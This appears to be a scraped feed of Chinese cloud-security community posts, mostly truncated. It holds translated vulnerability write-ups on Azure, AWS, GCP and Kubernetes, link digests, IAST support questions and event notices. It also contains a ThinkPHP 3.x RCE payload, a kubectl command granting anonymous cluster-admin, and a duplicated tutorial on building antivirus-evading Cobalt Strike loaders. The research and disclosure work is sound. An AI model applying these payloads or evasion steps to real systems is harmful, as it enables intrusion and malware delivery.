Azure Functions容器运行时会带有 –privileged Docker 的标识,这便造成在/dev目录下的设备文件在容器主机和容器来宾之间被共享,这是标准的特权容器行为,但是,这些设备文件对“其他”具有“rw”权限,如下所示,这是我们提出的漏洞的根本原因。
Azure Functions容器赋予用户的是低权限运行。容器的主机名包含单词Sandbox,这意味着:给用户赋予低权限是很重要的。容器运行时会带有 –privileged Docker 的标识,这意味着如果用户能够升级到 root,他们将能够使用各种 Docker 转义技术逃逸到Docker 主机。
设备文件的可访问权限不是标准行为。从我自己的本地特权容器设置中可以看出,/dev 中的设备文件默认情况下不可随意访问:
Azure Functions 环境包含 52 个带有 ext4 文件系统的“pmem”分区。起初,我们怀疑这些分区属于其他 Azure Functions 客户端,但进一步评估表明,这些分区只是同一操作系统使用的普通文件系统,包括 pmem0,它是 Docker 主机的文件系统。
为了进一步研究如何在不影响其他 Azure 客户的情况下利用此可写磁盘,我们在自己的容器中设置了一个本地环境来模仿该漏洞,以及非特权用户“bob”:
利用设备文件 o+rw
在我们的本地设置中,/dev/sda5 是根文件系
2022年6月23日 18:31火线zone
通过使用 log_fdw 扩展利用 RDS EC2 实例上的本地文件读取漏洞获得了内部 AWS 服务的凭证。原文地址:https://blog.lightspin.io/aws-rds-critical-security-vulnerability
您可能已经熟悉 Amazon RDS 是什么。但简而言之,Amazon Relational Database Service (RDS) 是一种托管数据库服务,它支持多种不同的数据库引擎,例如 MariaDB、MySQL,以及本文的测试用例:PostgreSQL。
探索
我使用 Amazon Aurora PostgreSQL 引擎创建了一个 Amazon RDS 数据库实例,并使用 psql 连接到数据库。


请注意,“postgres”用户不是真正的超级用户,它是rds_superuser。
AWS 文档将角色描述为“ rds_superuser 角色是预定义的 Amazon RDS 角色,类似于 PostgreSQL 超级用户角色(在本地实例中通常命名为 postgres),但有一些限制。”
显然,这个rds_superuser不能运行系统命令、读取本地文件或执行与机器相关的任何操作。否则,这太容易了😉
下图为尝试使用rds_superuser角色时失败操作的详情:

所以,我考虑过使用不受信任的语言来创建一个可以执行系统命令的函数,但是我无法加载不受信任的语言,例如plperlu或plpythonu。


返回错误时建议查看rds.extensions配置参数:

尽管 Amazon RDS for PostgreSQL 引擎支持许多语言扩展,但它们都不是不受信任的语言。因此,我决定对扩展做一些进一步的分析和研究,希望能找到线索。
log_fdw 扩展
9.6.2 及更高版本的 Amazon RDS for PostgreSQL 引擎支持log_fdw扩展。此扩展使用户能够使用 SQL 接口访问数据库引擎日志,并构建外部表,并将日志数据整齐地分成几列。
获取 log_fdw 扩展并将日志服务器创建为外部数据包装器。


创建扩展 log_fdw;
CREATE SERVER log_server FOREIGN DATA WRAPPER log_fdw; SELECT * FROM list_postgres_log_files() order by 1;
2022年6月23日 14:31火线zone
cat *.sql | mysql -u root -p --default-character-set=utf8mb4 dongtai_webapi


Enter password:
ERROR 1062 (23000) at line 12586: Duplicate entry 'Maven-com.github.marcioos:bgg-client-1.0' for key 'sca2_package_v2.fields'
原先使用的1.4.0版本,sql可正常导入,进行更新时候 1.8.0版本的sql会报错
手动核查发现:
主要有3个sql报错,分别是
1.1.1报错
[SQL] Query update-20211120-release-1.1.1 start
[ERR] 1060 - Duplicate column name 'strategy_id'
[ERR] SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS=0;
1.7.0-2报错
[ERR] 1267 - Illegal mix of collations (utf8mb4_0900_ai_ci,IMPLICIT) and (utf8mb4_general_ci,IMPLICIT) for operation '='
[ERR] SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS=0;
sca20220616.sql 大量报错 主要原因是字段重复啥的
洞态最新的1.8.0版本,自定义数据库方式在导入sca20220616.sql文件时会报错,显示需要super权限,排查发现报错是由于文件的第18行SET @@SESSION.SQL_LOG_BIN= 0引起的
这个使用 sed -i "" '18d' sca20220616.sql 命令将18行删除了
2022年6月23日 13:01火线zone
问题: 部分电脑无法正常启动,有些电脑可以正常启动,操作环境都相同
操作环境:M1 PRO
IAST:1.8.0
启动 Agent:1.7.0
增加 调试参数启动:服务无法正常启动
-Ddongtai.log.level=debug -Ddongtai.log=true

增加agent延时启动,服务可启动 但是agent依旧没有注入
-Diast.engine.delay.time=10
2022年6月23日 12:01火线zone
访问k8s集群的时候,需要经过三个安全步骤完成具体操作。过程中都要经过apiserver,apiserver做统一协调。
第一步 认证,判断用户是否为能够访问集群的合法用户。
第二步 鉴权,通过鉴权策略决定一个API调用是否合法。
第三步 准入控制,就算通过了上面两步,客户端的调用请求还需要通过准入控制的层层考验,才能获得成功的响应。大致意思就是到了这步还有一个类似acl的列表,如果列表有请求内容,就通过,否则不通。它以插件的形式运行在API Server进程中,会在鉴权阶段之后,对象被持久化etcd之前,拦截API Server的请求,对请求的资源对象执行自定义(校验、修改、拒绝等)操作。
这里学习认证和鉴权的安全机制。
1. 认证阶段
认证策略大概有4种:
匿名认证:(Anonymous requests)
匿名认证一般默认是关闭的。
白名单认证:(BasicAuth认证)
白名单认证一般是服务启动时加载的basic用户配置文件,并且通常没有更多设置的话basic认证仅仅只能访问但是没有操作权限。
Token认证:(Webhooks、ServiceAccount Tokens、OpenID Connect Tokens等)
token认证更涉及到对集群和pod的操作,这是我们比较关注的。
X509证书认证:(clientCA认证,TLS bootstrapping等)
X509证书认证是kubernetes组件间内部默认使用的认证方式,同时也是kubectl客户端对应的kube-config中经常使用到的访问凭证,是一种比较安全的认证方式。
2. 鉴权阶段
当API Server内部通过用户认证后,就会执行用户鉴权流程,即通过鉴权策略决定一个API调用是否合法,API Server目前支持以下鉴权策略:
Always:当集群不需要鉴权时选择AlwaysAllow
ABAC:基于属性的访问控制
RBAC:基于角色的访问控制
RBAC是目前k8s中最主要的鉴权方式。
Node:一种对kubelet进行授权的特殊模式
Node鉴权策略主要是用于对kubelet发出的请求进行访问控制,限制每个Node只访问它自身运行的Pod及相关Service、Endpoints等信息。
Webhook:通过调用外部REST服务对用户鉴权
可自行编写鉴权逻辑并通过Webhook方式注册为kubernetes的授权服务,以实现更加复杂
2022年6月23日 12:01火线zone
这篇博文旨在为提权操作提供思路,每一种方法后都附有利用脚本,这次是针对 Google Cloud Platform (GCP)。原文链接:https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
这篇文章旨在阐述如何权限提升,向大家提供利用的思路,以及方便大家迅速排查的相关POC。
如果大家对提权细节不太感兴趣,可以直接看 GCP的新提权扫描程序 章节,此工具允许您扫描您的 GCP 组织/环境以了解本文列出的所有提权方法。
访问令牌
在进入每种方法之前的最后一步。每种方法的脚本都需要来自 GCP 的访问令牌来进行身份验证。
要获取 gcloud CLI-Authenticated 用户的访问令牌,您可以运行以下命令:
gcloud auth print-access-token
在实际攻击中,此访问令牌可能来自服务器端请求伪造、来自一些人群的本地文件系统等。
PrivEsc 方法
部署管理器.deployments.create
这种权限可能是我们在 GCP 中发现的最简单但最强大的提权方法。此单一权限允许您以<project number>@cloudservices.gserviceaccount.comService Account的身份将新的资源部署到 GCP 中,默认情况下,该帐户被授予项目的 Editor 角色。更重要的是,不需要iam.serviceAccounts.actAs权限(在下面更详细地介绍),即使您实际上只是一个Service Account。这已报告给 Google Bug Bounty 计划,但我们被告知这属于正常的功能设计。
Deployment Manager 允许您以 YAML 或 Jinja 格式指定要在项目中创建和配置的资源。它基本上可以被视为一种基础设施即代码服务,类似于 AWS 中的 CloudFormation。我们指定的资源使用授予该Service Account的权限,而不是我们自己的用户。因此,只要我们有deploymentmanager.deployments.create,我们就可以控制该Service Account。
上面的屏幕截图显示我们使用 YAML 配置文件,其中指定了一个 Compute Engine 虚拟机实例。然后我们运行读取该 Y
2022年6月23日 11:31火线zone
超过 380 000 个开放的 Kubernetes API 服务器
https://www.shadowserver.org/news/over-380-000-open-kubernetes-api-servers/
6 种常见的 Kubernetes 和容器攻击技术以及如何预防它们
https://www.paloaltonetworks.com/blog/prisma-cloud/6-common-kubernetes-attacks/
什么是S3存储桶以及如何访问
https://blog.lightspin.io/how-to-access-aws-s3-buckets
您有多少 GCP 存储桶可公开访问? 可能比你想象的要多…
https://blog.lightspin.io/gcp-buckets-publicly-accessible
Amazon Redshift - 复制风险
https://blog.lightspin.io/aws-redshift-security-risk
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月23日 10:31火线zone
配置Agent,部分错误或者失效的配置,要如何从中心删除掉??
2022年6月22日 22:01火线zone
openjdk 1.8.212,K8S环境,内存设置750M
2022年6月22日 16:01火线zone
我这边有一些服务无法attach成功,对于这种情况应该如何排查?以及可能是啥原因导致的呢?
2022年6月22日 12:01火线zone
AWS Lambda 函数 URL的安全建设
https://zone.huoxian.cn/d/1281-aws-lambda-url
Azure PostgreSQL中的跨账户数据库漏洞
https://zone.huoxian.cn/d/1280-azure-postgresql
在 Kubernetes 中提升权限的 10 种方法
https://blog.lightspin.io/kubernetes-pod-privilege-escalation
云横向移动:突破易受攻击的容器
Cloud lateral movement: Breaking in through a vulnerable container | Sysdig
Linux 内核中的 CVE-2022-0185 可以允许 Kubernetes 中的容器逃逸
https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes
Azure:突发事件:CVE-2022-29972 (Azure Synapse 服务中的租户分离不足)
https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月22日 09:01火线zone
加了dongtai-agent之后,影响到应用的健康检测路径来,/health 500,,应用起不来.
SRV_REQUEST_PATH="health"
WEB_REQUEST_PATH="nohup.html"
加了agent后的/health路径有问题了
2022年6月22日 08:31火线zone
1.8.0 docker安装,点击组件功能报错,然后查看server模块,显示令牌错误,请问这是啥原因
2022年6月21日 19:02火线zone
了解配置错误的 Lambda 函数 URL 的安全风险以及如何正确保护它们,原文:https://www.wiz.io/blog/securing-aws-lambda-function-urls/
AWS 最近推出了Lambda 函数 URL,这是一项新功能,允许云构建者为 Lambda 函数设置简单的专用应用程序端点。其他云服务提供商也支持类似的功能,例如GCP HTTP 云函数和Azure 函数 HTTP 触发器。
尽管 Lambda 函数已经可以通过API 网关和负载均衡器对外公开, 但 Lambda URL 让 AWS 用户能够以最小的开销快速跟踪此过程,用于 webhook 处理程序等简单的用例。此外,可以在无服务器应用程序的开发和测试期间使用 Lambda URL,使开发人员可以专注于核心功能,并将验证和授权要求的处理推迟到开发的后期阶段。
使用 AWS Lambda 函数 URL 的不安全使用
Lambda 函数 URL 可能很简单,但与云环境中的任何其他外部公开资源一样,妥善保护它们很重要。
以下情况中,函数URL可能受到攻击:
攻击者在生产环境中发现了Lambda 函数 URL(我们将在下一节中对此进行扩展)
它已被错误配置为无需身份验证即可接受 HTTP 请求。
如果未配置身份验证,遵循默认配置:该函数的资源策略授权未经身份验证的主体调用。
攻击者对于所接收参数较为了解。
注:最后一个要求可能很棘手,取决于函数 API 的复杂性:
下图是有攻击风险的 Lambda 函数 URL:

在上述场景中,根据目标函数的作用,攻击者可能会对目标云环境构成多种风险:
任意数据读取和操作


如果目标函数对敏感或关键业务数据具有读取或写入权限,在某些情况下,攻击者可能会滥用该函数来查询、删除、覆盖或添加脏数据,影响其机密性和完整性。
权限提升


在极少情况下,目标函数旨在用于管理目的,例如创建新用户或角色、将用户添加到现有组、更改权限、修改策略、重置密码等,那么攻击者可以滥用该功能以获取对环境的访问权限或提升现有权限。
上马、挖矿


如果目标函数运行易受远程代码执行影响的软件的受影响版本,或者如果函数的代码本身恰好包含这样的漏洞,那么攻击者可能会发现这一点并利用它来运行恶意软件,例如挖矿,直到函数配置为超时,最长可达 15 分钟。
此外,即使没有完全理解函数的功能,也可以通过简单的自动重复调用函数便可
2022年6月21日 16:32火线zone
原文地址:https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/
Wiz Research 在广泛使用的Azure Database for PostgreSQL服务中发现了一系列严重漏洞。该漏洞被称为#ExtraReplica,允许未经授权的读取访问其他客户的 PostgreSQL 数据库,绕过租户隔离。如果被利用,攻击者可以获得 Azure PostgreSQL 服务器客户数据库的读取权限。
在这篇文章中,我们将介绍研究过程的各个步骤,从分析潜在的攻击面到完整的漏洞利用,以及我们最终如何绕过云隔离模型。
总体来看,我们实现了以下目标:
通过发掘和利用 Azure 的 PostgreSQL 服务器(Flexible Server)中的漏洞,在我们自己的 PostgreSQL 服务器(Flexible Server)上获得代码执行。
在该服务的内部网络中进行排查,发现我们可以通过网络访问子网中的其他客户实例。
发现在服务器认证过程中还存在一个漏洞:由于正则表达式末尾的通配符(.*)导致证书的通用名称(CN)的正则表达式验证过于宽松,使我们能够使用发给任意域的证书登录到目标PostgreSQL。需要关注一下正则表达式末尾的错误:
/^(.*?)\.eee03a2acfe6\.database\.azure\.com(.*)$/
用我们的域名(wiz-research.com)去颁发证书:
replication.eee03a2acfe6.database.azure.com.wiz-research.com
我们成功访问到我们自己在不同租户上搭建的独立账户的数据库,验证了跨账户数据库访问漏洞的存在。
利用证书透明度源来识别客户目标,最终允许我们使用前面提到的漏洞复制任何 PostgreSQL 灵活服务器实例(配置为私有访问 - VNet 的实例除外)。
研究初衷
我们之前在 Azure Cosmos DB 中发现了漏洞。我们能否在其他 Azure 服务中重现类似问题?
在 Black Hat Europe 2021 上,我们展示了“ ChaosDB:我们如何入侵了数千名 Azure 客户的数据库”——披露了我们如何通过 Azure Cos
2022年6月21日 16:32火线zone
登录进去点击查看漏洞和组件报接口异常,然后查看docker的server镜像日志,发现这些报错,是不是镜像有问题?
2022年6月21日 15:02火线zone
请问下这个是服务端问题,还是客户端问题,客户端jdk是openjdk 1.8.212
2022年6月21日 13:02火线zone
因为云,我们有了无限的可能,而复杂性也随之增加。确保每个应用在所有环境中都完美运行不是一件很容易的事情,何况只选择一家云服务商可能并不能满足企业多线业务的需求,企业需要在按需扩展的同时保持一致的安全性,并通过成熟的自动化运维来确保业务的稳定性。
对于大多数组织而言,无论多云环境是如何引入的, 保护多云平台的安全始终是摆在公司企业面前的一大挑战。在可预见的将来,它将保持多云、多厂商的世界。问题是,所有领先供应商的安全模型是否将合并,以使企业能够利用单一的优势来管理安全的所有方面,并实现更好的威胁管理和分析。
本期沙龙,我们将针对企业面临的多云安全开展话题讨论,帮助企业和云厂商更好地解决多云环境下的应用安全。
|火线沙龙第26期|多云安全专场
|时间|2022年6月25日(周六)19:00-21:00
|地点|火线安全——视频号直播间
沙龙议题
孔松丨数字化时代云安全能力建设及趋势
近年来,以云计算为承载的数字基础设施成为产业数字化转型的重要支撑,有效助力企业提质降本增效。随着云计算承载越来越多的重要数据和关键业务,云安全受到广泛重视。
一方面云平台安全性影响海量租户,是各租户云上业务安全的基座;另一方面,租户应建立适应云上业务新需求的安全防护体系。本演讲将围绕上述两方面,对数字化时代云安全能力的建设要求和未来趋势进行分享。
陈宇丨安全->云安全->多云安全
主要聊聊在多云的环境下,对于安全建设,运维上的挑战,以及针对主流的云基础架构如Kubernetes、Serverless等,在多云的环境下如何做好安全保护。
刘对丨多云环境的风险发现
随着云计算时代的到来,越来越多的业务被部署到了 AWS、阿里云等等的多云环境下,租户与厂商的安全责任边界开始变得模糊,这里将谈谈作为租户的我们,如何判断在多云环境下的责任边界问题以及所面临的挑战与缓解方法。
沙龙流程
沙龙参与方式
本次沙龙分享将在视频号——火线安全直播间
欢迎邀请好友进群,可瓜分群红包
*进群+预约*,精彩不错过
扫码进入本次沙龙群
参与抽奖
火线定制T袖1件 x 5
关于火线Zone:
火线Zone是[火线安全平台]运营的云安全社区,内容涵盖云计算、云安全、漏洞分析、攻防等热门主题,研究讨论云安全相关技术,助力所有云上用户实现全面的安全防护。
关于火线沙龙:
火线安全旗下云安全社区【火线Zone】运营的云安全技术沙龙,旨在聚焦技术前沿、关注云上安全,邀约全国的安
2022年6月21日 13:02火线zone
我采用docker部署,明明空间足够,但是升级时就是提示空间不够,请问各位大佬是纱问题
2022年6月21日 11:32火线zone
![洞态最新的1.8.0版本,自定义数据库方式在导入sca20220616.sql文件时会报错,显示需要super权限,排查发现报错是由于文件的第18行SET @@SESSION.SQL_LOG_BIN= 0引起的,百度了下看有个帖子说MySQL5.7有个bug,无法在子查询或者事务中执行set @@session.sql_log_bin,不知道能否把这一句删掉,求助各位大佬!
2022年6月21日 10:32火线zone
对泄露的Azure存储密钥的挖掘和利用
https://zone.huoxian.cn/d/1272-azure
两张思维导图,帮你理清 K8s 中 Pod 的 phase 和 conditions
https://mp.weixin.qq.com/s/f6vKgBBuMaO5mVYDbhQl1w
RSAC议题解读|真实云安全事件复盘与思考
https://mp.weixin.qq.com/s/DKWsbQsqy_2K23dvBGmSFw
滥用 TYK 云 API 管理来隐藏你的恶意 C2 流量
https://shells.systems/oh-my-api-abusing-tyk-cloud-api-management-service-to-hide-your-malicious-c2-traffic/
企业需要了解的云中容器威胁
https://containerjournal.com/features/container-threats-in-the-cloud-what-enterprises-need-to-know/
在你的内部 AD 和 Azure 环境中建立安全边界
https://securityboulevard.com/2022/06/establish-security-boundaries-in-your-on-prem-ad-and-azure-environment/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月20日 18:01火线zone
CVE-2022-25165:AWS VPN 客户端中的 SYSTEM 权限提升
https://zone.huoxian.cn/d/1266-cve-2022-25165aws-vpn-system
在AWS中,将支持MFA的IAM用户与IAM角色链接起来,以实现潜在的权限升级
https://zone.huoxian.cn/d/1267-awsmfaiamiam
k8s之apiserver组件风险
https://zone.huoxian.cn/d/1269-k8sapiserver
Google Cloud Shell容器逃逸漏洞浅析
https://mp.weixin.qq.com/s/jt1uds30qUDg2sq1qg7eHg
安全 101:云原生虚拟补丁
https://www.trendmicro.com/en_us/devops/22/f/cloud-native-virtual-patching-101.html
存储桶上传策略和签名 URL的绕过及利用
https://www.anquanke.com/post/id/275054
云安全的责任共担模型问题
https://orca.security/resources/blog/cloud-security-shared-responsibility-model-problem/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月20日 17:31火线zone
本文为译文,原为链接为:https://notsosecure.com/identifying-exploiting-leaked-azure-storage-keys
摘要(全文脉络)
访问泄露的存储帐户的访问密钥
连接到存储帐户并下载 Blob、文件等
文件中包含 Azure 函数的代码
使用 web-shell 创建一个新的 HTTP 触发器
将恶意文件作为新触发器上传到 Azure 文件并运行操作系统命令
Azure 存储帐户访问密钥(Access Keys)和 SAS URI
Azure 存储帐户使用包含帐户名称和密钥的凭据。创建存储帐户时会自动生成该密钥,该密钥将用作连接到 Azure 存储的密码。默认情况下,存储访问密钥具有所有权限,类似于存储帐户的root密码。
Azure 存储帐户包含的存储类型有: Blob、队列、表和文件(共享文件夹或驱动器),并可通过API访问。

此外,Azure 提供了共享访问签名 (SAS) URI,用于授予对存储对象的细粒度访问权限。SAS URI,可以控制要公开哪些数据,以及对这些对象赋予哪些权限(SignedPermission),以及 SAS URI 的有效时间(SignedExpiry),其他参数如下所述:
https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
更多详细信息:https ://docs.microsoft.com/en-us/rest/api/storageservices/create-account-sas
查找访问密钥(Access Keys)和 SAS URI
Access Keys和SAS URI 至关重要,故我们需防止出现未经授权漏洞导致的信息泄露的情况出现。但在某些情况下,此信息可在公共资源中获得。我们可创建了一个参数列表,有助于查找帐户名称、密钥和 SAS URI。
账户名称和密钥
https://github.com/search?l=
2022年6月20日 17:01火线zone
火线Zone社区
火线Zone是[火线安全平台]运营的云安全社区,内容涵盖云计算、云安全、漏洞分析、攻防等热门主题,研究讨论云安全相关技术,助力所有云上用户实现全面的安全防护。
欢迎具备分享和探索精神的云上用户加入火线Zone社区,共建一个云安全优质社区!
投稿方式
进入火线Zone 【https://zone.huoxian.cn/】 点击左上方 #发布主题#-> 在文章开头选择#添加标签#
文章发布后,社区管理员将对其进行审核并进行精华优选,请耐心等待审核。
文章稿件支持Markdown格式
投稿要求
原创文章:
以云安全、云原生、容器、微服务、DevOps、Kubernetes、企业最佳实践相关主题为主;渗透测试、红蓝对抗、漏洞分析等可根据文章内容质量审核奖励。
要求:具备原创性,内容具备深度和可读性,文章内容质量高,观点新颖。
分类:请添加官方标签#原创文章#,否则不计入奖励。


翻译文章:
以高质量国外云安全相关主题为主。
要求:文章技术含量高,语句通顺无技术词汇翻译错误,拒绝不经过思考的机器翻译,文章开头或结尾必须备注文章原链接。
分类:请添加官方标签#翻译文章#,否则不计入奖励。
投稿奖励
针对被设为精华的原创文章,给予现金奖励300-500元,视文章类型和质量上下浮动。// 首次被评为精华的原创作者,可获得火线玩偶一个,请联系火线小助手。
针对原创文章,点赞≥10,给予奖励200-500查克拉。
针对被设为精华的翻译文章,给予奖励300-600查克拉,视文章类型和质量上下浮动。
针对翻译文章,点赞≥10,给予奖励200查克拉。
投稿评分标准
文章的深度及广度
文章的完整性和可读性
文章阅读量及优质点赞评论数量
(以5分满分为标准,评分由火线审核进行确认)
奖励发放说明
符合文章激励的内容将会对外发表在【火线Zone】公众号上。
火线Zone中的查克拉奖励不包含Rank奖励,Rank的获取目前只能通过提交有效漏洞获取。
所有奖励每周一进行结算(即本周奖励结算上周的文章),结算完将在火线Zone社区进行结果公示,如有异议请及时联系#火线小助手#。
无异议后将在周二或周三发放奖励至火线安全平台账号内,可进行现金提现或兑换商品。
2022年6月19日 11:31火线zone
前言
github上翻一翻看看有没有好的项目,针对免杀的内容,还是挺有趣的。
杀软检测和免杀
杀软的工作原理就是基于特征码检测、关联检测和行为分析。关联分析是基于代码块或者说核心内容,例如shellcode,行为分析基于动态检测,类似于沙箱。静态的免杀一般都是直接对shellcode做增加随机字符混淆,修改特征、增加花指令,加壳等。
GLLLoader
安装gcc环境
https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-win32/seh/x86_64-8.1.0-release-win32-seh-rt_v6-rev0.7z
不要想着直接下载exe,在线安装有问题,解压到安装目录,添加环境变量
gcc -v
安装 nim
https://nim-lang.org/install_windows.html
解压后添加环境变量
使用cs,生成原生木马
启动服务端,客户端创建监听
生成可执行文件,这里选用32位的,64位的免杀马无法上线
生成artifact.exe
python3 ./Gllloader.py
加载器免杀,使用shellcode免杀
以cs原生木马免杀,生成的可执行文件为Green.exe
但是无法上线
使用poweshell上线,做免杀,无法运行脚本,默认状态下win10是禁用powershell。
set-executionpolicy remotesigned
设置为yes即可
Cool免杀平台
项目
https://github.com/Ed1s0nZ/cool
安装go环境
https://golang.google.cn/dl/
添加环境变量
C:\Users\Administrator>go env -w GO111MODULE=on C:\Users\Administrator>go env -w GOPROXY=https://goproxy.io,direct C:\Users\Administrator>go install mvdan.cc/garble@latest
执行coolv01.exe
http://127.0.0.1:9000/
到这里其实见过两个版本的,之前有个版本
2022年6月19日 00:21火线zone
前言
github上翻一翻看看有没有好的项目,针对免杀的内容,还是挺有趣的。
杀软检测和免杀
杀软的工作原理就是基于特征码检测、关联检测和行为分析。关联分析是基于代码块或者说核心内容,例如shellcode,行为分析基于动态检测,类似于沙箱。静态的免杀一般都是直接对shellcode做增加随机字符混淆,修改特征、增加花指令,加壳等。
GLLLoader
安装gcc环境
https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-win32/seh/x86_64-8.1.0-release-win32-seh-rt_v6-rev0.7z
不要想着直接下载exe,在线安装有问题,解压到安装目录,添加环境变量
gcc -v
安装 nim
https://nim-lang.org/install_windows.html
解压后添加环境变量
使用cs,生成原生木马
启动服务端,客户端创建监听
生成可执行文件,这里选用32位的,64位的免杀马无法上线
生成artifact.exe
python3 ./Gllloader.py
加载器免杀,使用shellcode免杀
以cs原生木马免杀,生成的可执行文件为Green.exe
但是无法上线
使用poweshell上线,做免杀,无法运行脚本,默认状态下win10是禁用powershell。
set-executionpolicy remotesigned
设置为yes即可
Cool免杀平台
项目
https://github.com/Ed1s0nZ/cool
安装go环境
https://golang.google.cn/dl/
添加环境变量
C:\Users\Administrator>go env -w GO111MODULE=on C:\Users\Administrator>go env -w GOPROXY=https://goproxy.io,direct C:\Users\Administrator>go install mvdan.cc/garble@latest
执行coolv01.exe
http://127.0.0.1:9000/
到这里其实见过两个版本的,之前有个版本
2022年6月18日 21:21火线zone
apiserver简介
API Server 作为 K8s 集群的管理入口,在集群中被用于提供API来控制集群内部。默认情况下使用 8080 (insecure-port,非安全端口)和 6443 (secure-port,安全端口)端口,其中 8080 端口无需认证,6443端口需要认证且有 TLS 保护。
apiserver工作原理图:

而apiserver在渗透测试过程中受到以下风险:
apiserver的Insecure-port端口对外暴露
apiserver未授权配置错误(匿名访问+绑定高权限角色)
历史apiserver提权漏洞(例如CVE-2018-1002105)
配置不当的RBAC受到的提权风险
apiserver权限维持
...
1.apiserver的Insecure-port端口对外暴露
API Server 作为 K8s 集群的管理入口,在集群中被用于提供API来控制集群内部。默认情况下使用 8080 (insecure-port,非安全端口)和 6443 (secure-port,安全端口)端口,其中 8080 端口无需认证,6443端口需要认证且有 TLS 保护。
如果其在生产环境中Insecure-port 被暴露出来,便利用此端口进行对集群的攻击。
但是这种情况很少了,条件必须是低版本(1.20版本后该选项已无效化)加配置中(/etc/kubernets/manifests/kube-apiserver.yaml )写了insecure-port选项,默认不开启:

2.apiserver未授权配置错误(匿名访问+绑定高权限角色)
Api server的 6443 (secure-port,安全端口)认证是需要凭据的。
如果配置错误,将system:anonymous用户绑定到了cluster-admin用户组,那么匿名用户可以支配集群。
kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=cluster-admin --user=system:anonymous
这种配置下可以拿到所有token后与api server交互,支配集群:

3.历史apiserver提权漏洞(例如CVE-2018-1002105)
CVE-2018-1002105是一个K8s提权漏洞,Kubernet
2022年6月17日 20:50火线zone
ThinkPHP3.xshow命令执行漏洞分析
show方法参数可控导致RCE
代码
Application/Home/Controller/IndexController.class.php控制入口输入下列代码
<?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function index($n = '') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 14px 28px;"> <h2>Thinkphp3.2.3 show函数命令执行</h2><p>注入点:"?n="' . $n . '</p>', 'utf-8'); } }
payload
http://www.tp3.com/index.php/home/index/index?n=<?php system("whoami");?>
漏洞分析
首先进入到show方法
接着进入到display方法,又调用了fetch方法
来看这个方法,如果content不为空,并且使用了PHP原生模板,就会直接载入PHP模板
public function fetch($templateFile='',$content='',$prefix='') { if(empty($content)) { $templateFile = $this->parseTemplate($templateFile); // 模板文件不存在直接返回 if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIS
2022年6月17日 16:50火线zone
原文地址:https://www.praetorian.com/blog/stsgetsessiontoken-role-chaining-in-aws/
概述
在AWS中,sts:AssumeRole是 AWS 安全令牌服务中的一项操作,通过一组临时安全凭证,您可以使用它们来访问您通常无法访问的 AWS 资源。例如,角色 A 可以代入角色 B,然后使用角色 B 的权限访问 AWS 资源。
多个sts:AssumeRole调用可以把角色链接到一起。如果角色 A 可以带入角色 B,而角色 B 可以带入角色 C,则有权访问角色 A 的人可以通过调用sts:AssumeRole角色链接一起获得角色 C 的权限。对攻击者来说,这是一条可以利用来提升权限的途径;对于企业安全团队来说,这恰好是经常忽略的地方。
在这篇博文中,我们将讨论一种特定的角色链接路径,该路径从具有 MFA 的 IAM 用户开始。在研究此权限提升路径时,Praetorian 注意到与 sts:GetSessionToken 和 Policy Simulator 相关的文档和权限不一致,并将这些情况报告给 AWS Security。由于与 AWS 文档和策略模拟器的不一致,AWS 客户可能会错误配置安全控制并忽略 AWS IAM 用户,但这些用户却可以通过角色链来提升权限。
时间线
2022 年 5 月:Praetorian 向 AWS Security 报告了这些问题。
2022 年 5 月:AWS 更新了文档以阐明 sts:GetSessionToken。
已计划:AWS 计划为 sts:GetSessionToken 和 sts:GetCallerIdentity 更新 IAM 策略模拟器。
复现过程
AWS 和 MFA
AWS 建议配置多重身份验证(MFA) 以帮助保护 AWS 资源。在 AWS 中,安全团队可以为 IAM 用户或 AWS 账户根用户启用 MFA。
下图为AWS中的MFA提示:

验证IAM 用户的 MFA
AWS IAM 策略支持多种 MFA 条件,包括:
aws:MultiFactorAuthPresent 存在
aws:MultiFactorAuthAge 持续时间
这些 MFA 条件验证 AWS API 和 CLI 操作上是否存在 MFA。在这个角色链的例子中,这些条件适用于几个地方:
直接基于 IAM 用户的权限。下图显示
2022年6月17日 15:50火线zone
每天一个CVE,赚钱变得好容易!原文链接:https://rhinosecuritylabs.com/aws/cve-2022-25165-aws-vpn-client/
漏洞概述
AWS VPN应用程序存以 SYSTEM 身份写入任意文件,这可能导致提权和信息泄露漏洞。该漏洞可能导致用户的 Net-NTLMv2 哈希被VPN 配置文件中的 UNC 路径泄露。这些漏洞已确认影响版本 2.0.0,并已在版本 3.0.0 中修复。
要修复漏洞,请升级到可在此处下载的3.0.0 版本。
受影响的产品
供应商:Amazon Web Service (AWS)
产品:AWS VPN Client (Windows)
确认漏洞版本:2.0.0
固定版本:3.0.0
CVE-2022-25166:任意文件写入
